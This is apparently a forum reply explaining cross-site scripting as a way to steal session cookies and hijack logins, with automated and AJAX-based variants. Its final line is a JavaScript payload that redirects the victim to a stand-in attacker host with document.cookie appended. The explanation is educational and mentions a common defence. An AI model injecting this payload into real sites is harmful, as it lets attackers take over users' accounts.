Not at all easy. There are ways to do it, however. The most widely publicised is XSS (also known as CSS, but I use XSS to avoid confusion): Cross-Site Scripting. This occurs when a site inadvertantly allows client-side scripting to be embedded in one of its pages. This could be something like this:
When a user unwittingly executes the code, the cookie is transmitted to the malicious user's site, which can use PHP to extract and store the SID, and, if he uses it fast enough, hijack a session on the vulnerable site, bypassing the login procedure altogether. This is why most forums require their users to enter their password before modifying vital data, even if they're already logged in. A more advanced version of the script above is one that, using a server-side script to connect from the malicious user's server, automatically hijacks the session and changes the login details if possible, mitigating the need for the malicious user's intervention. Other tweaks can be made to the above setup too, of course, like using AJAX to do it all behind the scenes without the victim ever knowing.
window.location.href = 'http://www.evilsite.com/stealsid.php?cookie=' + escape(document.cookie);